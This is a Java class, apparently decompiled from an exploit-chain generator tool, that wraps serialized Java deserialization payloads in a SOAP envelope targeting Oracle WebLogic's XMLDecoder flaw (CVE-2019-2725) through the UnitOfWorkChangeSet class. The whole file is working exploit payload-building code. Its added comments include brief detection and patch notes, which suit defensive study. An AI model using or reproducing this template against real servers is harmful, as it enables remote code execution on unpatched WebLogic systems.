package com.ar3h.chains.gadget.impl.common.other;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.XMLDecoderUtil;

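/**
 * Chain step that wraps the bytes produced by the next gadget in a fixed SOAP envelope
 * whose {@code work:WorkContext} header carries an XMLDecoder-style {@code <class>} element.
 *
 * <p>This class only builds text. It is unrelated to {@code java.beans.XMLDecoder}, which it
 * shadows by simple name.
 *
 * <p>English rendering of the annotation strings below, which are left verbatim because they
 * are annotation values rather than comments:
 * <ul>
 *   <li>name: "Convert Java deserialization data into XMLDecoder format"</li>
 *   <li>description: "Applicable to XMLDecoder deserialization, e.g. WebLogic CVE-2019-2725;
 *       depends on the oracle.toplink.internal.sessions.UnitOfWorkChangeSet class"</li>
 * </ul>
 *
 * <p>Detection and mitigation notes for reviewers: every part of the envelope except the
 * {@code %s} slot is constant, so the literal class name
 * {@code oracle.toplink.internal.sessions.UnitOfWorkChangeSet} inside a
 * {@code work:WorkContext} SOAP header is a stable string to match in request logs and
 * WAF/IDS rules. The durable fix is the vendor patch for the CVE named in the description,
 * and more generally never handing untrusted XML to an XMLDecoder.
 */
@GadgetAnnotation(name = "将Java反序列化数据转为XMLDecoder格式", description = "适用于 XMLDecoder 反序列化，例如 WebLogic CVE-2019-2725, 依赖 oracle.toplink.internal.sessions.UnitOfWorkChangeSet 类", authors = {Authors._4ra1n}, priority = 20)
@GadgetTags(tags = {Tag.Other}, nextTags = {Tag.JavaNativeDeserializePayload, Tag.CustomJavaDeserialize})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/other/XMLDecoder.class */
public class XMLDecoder implements Gadget {
    /**
     * SOAP envelope with a single {@code %s} slot inside {@code <void>...</void>}.
     *
     * <p>Declared {@code final} because it is never reassigned; a mutable static would let any
     * code in this class change the envelope for every later call. The literal is split at its
     * embedded newlines only; the concatenated value is character-for-character the original.
     */
    private static final String ENVELOPE_TEMPLATE =
            "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n"
            + "    <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\n"
            + "    xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"\n"
            + "    xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\n"
            + "    <soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>\n"
            + "    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n"
            + "    <class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>%s</void></class>\n"
            + "     </work:WorkContext>\n"
            + "     </soapenv:Header>\n"
            + "     <soapenv:Body></soapenv:Body></soapenv:Envelope>";

    /**
     * Renders the envelope for one byte array.
     *
     * @param obj the upstream gadget's output; must be a {@code byte[]}
     * @return the envelope as a {@link String}, with the slot filled by
     *     {@code XMLDecoderUtil.generateClassBytesXml} (presumably an XML rendering of the
     *     bytes; confirm against that helper)
     * @throws ClassCastException if {@code obj} is not a {@code byte[]}
     * @throws Exception declared by the original signature; the visible code adds no checked
     *     throws of its own
     */
    public Object getObject(Object obj) throws Exception {
        // Cast first so a wrong upstream type fails before any XML is generated.
        byte[] serialized = (byte[]) obj;
        // The fragment is passed as a format argument, never as the format string, so any
        // '%' inside it is not interpreted by String.format.
        return String.format(ENVELOPE_TEMPLATE, XMLDecoderUtil.generateClassBytesXml(serialized));
    }

    /**
     * Runs the rest of the chain and wraps its result.
     *
     * @param gadgetContext context forwarded unchanged to {@code gadgetChain.doCreate}
     * @param gadgetChain the remaining chain, whose result is expected to be a {@code byte[]}
     * @return the envelope produced by {@link #getObject(Object)}
     * @throws Exception whatever the downstream chain or {@link #getObject(Object)} throws
     */
    @Override
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        Object downstream = gadgetChain.doCreate(gadgetContext);
        return getObject(downstream);
    }
}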
